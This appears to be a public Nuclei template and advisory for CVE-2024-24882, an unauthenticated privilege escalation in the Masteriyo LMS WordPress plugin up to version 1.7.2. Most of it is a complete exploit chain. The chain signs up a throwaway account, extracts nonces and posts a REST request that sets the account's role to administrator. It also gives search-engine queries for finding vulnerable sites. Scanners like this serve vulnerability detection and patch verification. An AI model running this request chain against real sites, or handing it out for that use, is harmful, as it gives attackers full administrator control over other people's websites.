The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the update_logged_in_user() function in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.
PoC代码[已公开]
id: CVE-2024-24882
info:
name: Masteriyo LMS <= 1.7.2 - Unauthenticated Privilege Escalation
author: riteshs4hu
severity: critical
description: |
The Masteriyo LMS – eLearning and Online Course Builder for WordPress plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the update_logged_in_user() function in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to elevate their privileges to that of an administrator.
impact: |
An unauthenticated attacker can escalate privileges and gain full administrator access.
remediation: |
Update the Masteriyo LMS plugin to version 1.7.3 or later and ensure proper capability checks are enforced.
reference:
- https://wpscan.com/vulnerability/8407f428-12e7-4549-aa65-a241b7bdca41/
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learning-management-system/masteriyo-lms-172-unauthenticated-privilege-escalation
- https://plugins.trac.wordpress.org/changeset/3022839/learning-management-system/tags/1.7.3/includes/RestApi/Controllers/Version1/UsersController.php?old=2959283&old_path=learning-management-system%2Ftrunk%2Fincludes%2FRestApi%2FControllers%2FVersion1%2FUsersController.php
- https://nvd.nist.gov/vuln/detail/CVE-2024-24882
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-24882
epss-score: 0.00665
epss-percentile: 0.70656
cwe-id: CWE-269
cpe: cpe:2.3:a:themegrill:masteriyo:*:*:*:*:free:wordpress:*:*
metadata:
verified: true
max-request: 4
vendor: themegrill
product: masteriyo
fofa-query: body="/wp-content/plugins/learning-management-system/"
google-query: inurl:"/wp-content/plugins/learning-management-system/"
tags: cve,cve2024,wordpress,wp,wp-plugin,lms,priv-esc,learning-management-system,vkev,intrusive
variables:
uname: "{{rand_base(4)}}"
http:
- raw:
- |
GET /account/signup/ HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: wpnonce
group: 1
regex:
- 'name="_wpnonce"[^>]*?value="([A-Za-z0-9]+)"'
internal: true
- raw:
- |
POST /account/signup/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
remember=true&first-name={{uname}}&last-name={{uname}}&username={{uname}}&email={{uname}}%40gmail.com&password=Test%40123&confirm-password=Test%40123&_wpnonce={{wpnonce}}&_wp_http_referer=%2Faccount%2Fsignup%2F&masteriyo-registration=yes
redirects: true
- raw:
- |
GET /account/ HTTP/1.1
Host: {{Hostname}}
redirects: true
extractors:
- type: regex
name: profile_nonce
part: body
group: 1
regex:
- '"nonce":"([a-zA-Z0-9]+)"'
internal: true
- raw:
- |
POST /wp-json/masteriyo/v1/users/me/?_locale=user HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{profile_nonce}}
Content-Type: application/json
{"first_name":"{{uname}}","last_name":"{{uname}}","email":"{{uname}}@gmail.com","role":"administrator","billing":{"state":"No state found"}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(tolower(content_type), "application/json")'
- 'contains(body, "\"roles\":[\"administrator\"]")'
condition: and
# digest: 4b0a00483046022100ce84ffce755eb62e39135210be4cac1e691f318c49ca70582065f46755d82ba1022100a0c61118b6ddc1170136d784e1a3a3c9dd9ca3b1d2a0a23ed3f1ec9d3e1df375:922c64590222798bb761d5b6d8e72950